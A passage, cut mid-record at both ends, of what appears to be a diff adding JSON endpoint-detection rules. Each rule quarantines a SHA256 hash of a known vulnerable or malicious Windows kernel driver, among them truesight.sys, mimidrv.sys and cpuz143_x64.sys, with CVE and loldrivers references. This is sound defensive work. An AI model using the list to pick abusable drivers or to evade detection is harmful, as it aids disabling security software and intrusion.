"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145291Z", + "creation_date": "2026-03-23T11:45:32.145295Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145302Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8e681ed97f08f8dc269c85b75160a508e59ba3045ddb14f99d64dd767dc556ba", + "comment": "Malicious Kernel Driver (aka driver_77225a99.sys) 
[https://www.loldrivers.io/drivers/5fb86651-c152-404a-9a2f-0f54b0d2bb55/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "886f8a99-caa8-5a18-b353-0accdeb04181", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834326Z", + "creation_date": "2026-03-23T11:45:30.834329Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834338Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd0d5cfc979656771528d3b0b06176198ea6db6dce738a75a2a1104ec7d79adf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88750238-1419-5a83-a6fc-0908e9044de7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826549Z", + "creation_date": 
"2026-03-23T11:45:30.826551Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826557Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ad53841b2f9e90005057b3c436060baa8d2031f8c0e2dc43144452fa8c6d63b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88771e57-58bb-5fe1-ac07-e0c0eaae184c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815708Z", + "creation_date": "2026-03-23T11:45:30.815710Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815716Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be62ed235421930c84ce9c7789f3beb6b7a48a6bca9065063b7ce78effde1db2", + "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"887e1105-555e-5987-9c6d-e58bd375dc63", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817053Z", + "creation_date": "2026-03-23T11:45:30.817055Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817060Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81d54ebef1716e195955046ffded498a5a7e325bf83e7847893aa3b0b3776d05", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8882eb4f-8a08-5d0a-9236-595dae04cca7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974299Z", + "creation_date": "2026-03-23T11:45:29.974301Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.974306Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ed3d54fb8222d861785f0d7e71d6223278fbf4d0baa335a54813087d7c3674e", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "888a5efc-afe3-5771-aa34-3fb59335367d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622491Z", + "creation_date": "2026-03-23T11:45:29.622493Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622499Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e3b257357be41a18319332df7023c4407e2b93ac4c9e0c6754032e29f3763eac", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88aae4ce-8e46-53d9-8189-d07f835d6578", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823359Z", + "creation_date": "2026-03-23T11:45:30.823365Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823375Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "891ad430e7f1d58ef85b437505a6016fa99a72abcfd4734476efc5fc1fcd1cba", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller AntiMalware Driver (aka truesight.sys) [https://github.com/ph4nt0mbyt3/Darkside] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88bad8d1-2aa9-5ef7-8ae4-5dad7748abf8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820894Z", + "creation_date": "2026-03-23T11:45:30.820896Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820901Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "37d999df20c1a0b8ffaef9484c213a97b9987ed308b4ba07316a6013fbd31c60", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88c1d35b-2a83-56c9-8320-2afc9bc424cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985304Z", + "creation_date": "2026-03-23T11:45:29.985306Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985311Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3243aab18e273a9b9c4280a57aecef278e10bfff19abb260d7a7820e41739099", + "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88c86f6d-8a0b-52ea-a2aa-62fc24430ccc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156073Z", + "creation_date": "2026-03-23T11:45:31.156075Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156081Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc8f9bb57eea8ab776ae7391505ffb5fdb7858d81270b97eac40cd7acdf81877", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88cd7ef8-9495-5684-aa6b-681251781c96", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493143Z", + "creation_date": "2026-03-23T11:45:31.493146Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493155Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a8480b44d50421c9ec4cfa00590bc48ca68527e821cc3d7e71860b491e30a41b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88cfffe3-8b2d-5342-90d8-a4ebc453933a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492467Z", + "creation_date": "2026-03-23T11:45:31.492469Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492474Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5baedc54ef0f89578724cbd3ebe5d6c38c2c5795f6cd21e65e575f6a91ead007", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88d6e481-c171-5d3a-9281-935afca0df92", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618887Z", + "creation_date": 
"2026-03-23T11:45:29.618889Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618894Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6", + "comment": "Vulnerable Kernel Driver (aka amp.sys) [https://www.loldrivers.io/drivers/ca768fc5-9b5c-4ced-90ab-fd6be9a70199/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88e5f198-b107-579e-a5e4-d97baf71c799", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475446Z", + "creation_date": "2026-03-23T11:45:30.475449Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475459Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "42ff11ddb46dfe5fa895e7babf88ee27790cde53a9139fc384346a89e802a327", + "comment": "Malicious Kernel Driver (aka a26363e7b02b13f2b8d697abb90cd5c3.sys) [https://www.loldrivers.io/drivers/ef6b5fe8-6c4b-4b32-8adc-c1d8a83e8558/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88ee419a-6dfb-573a-b316-977b6085be0b", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478475Z", + "creation_date": "2026-03-23T11:45:31.478491Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478514Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43a059aae1238eb3a19fd1ee7a7c9ef3ddfe903bab91c377b4e44238010b4b7f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88f5eb26-4477-5a52-99c0-8509e0d33537", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605647Z", + "creation_date": "2026-03-23T11:45:29.605649Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605654Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6e944ae1bfe43a8a7cd2ea65e518a30172ce8f31223bdfd39701b2cb41d8a9e7", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88faca8b-0bd8-52ab-8b66-794997efe566", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475251Z", + "creation_date": "2026-03-23T11:45:31.475255Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475264Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b89b1e137d6bdac313585b007d5d063d8a5c7864b42017d8d1a7188d6b1276d8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88fd5d44-19da-537e-b0af-1953bc63e9b5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820231Z", + "creation_date": "2026-03-23T11:45:30.820232Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820238Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "73664268a737d071f2c3c67503002db08432953f14771317835b6f080d3daeff", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "890a040d-13d9-583a-b30d-a90821109f33", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618603Z", + "creation_date": "2026-03-23T11:45:29.618605Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618610Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cc041a5c21339d62c9ea05215c2c42697f73a3820c83133eb6c6fa574a095384", + "comment": "NVIDIA 
vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "89122970-562e-5a50-bb3a-e07fc760d058", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610141Z", + "creation_date": "2026-03-23T11:45:29.610143Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610149Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "45c3d607cb57a1714c1c604a25cbadf2779f4734855d0e43aa394073b6966b26", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "89237bd7-2fc4-5256-bca6-fb30fb8c6b1a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, 
+ "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467678Z", + "creation_date": "2026-03-23T11:45:30.467681Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467690Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "63e9918f94a1ae5d71e8972f49bfbce13d8b1774b7237b022f182f03cc9ce715", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "892a5e6f-133a-5067-8c1c-f552f00b5b47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485978Z", + "creation_date": "2026-03-23T11:45:31.485982Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485992Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ba874cc6574578d137caea35cd8e2133ed9d5ad55fb16701dd3d4be74cff9468", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8940aa3e-12ac-5608-ad60-0cc75913fc40", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972843Z", + "creation_date": "2026-03-23T11:45:29.972846Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972851Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "56e8b8d21317d58abd8399b276ee800c62a53e864cd3553899e33b8616ef07a6", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8945d603-a254-516a-9d54-b613645f43dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969221Z", + "creation_date": "2026-03-23T11:45:29.969223Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
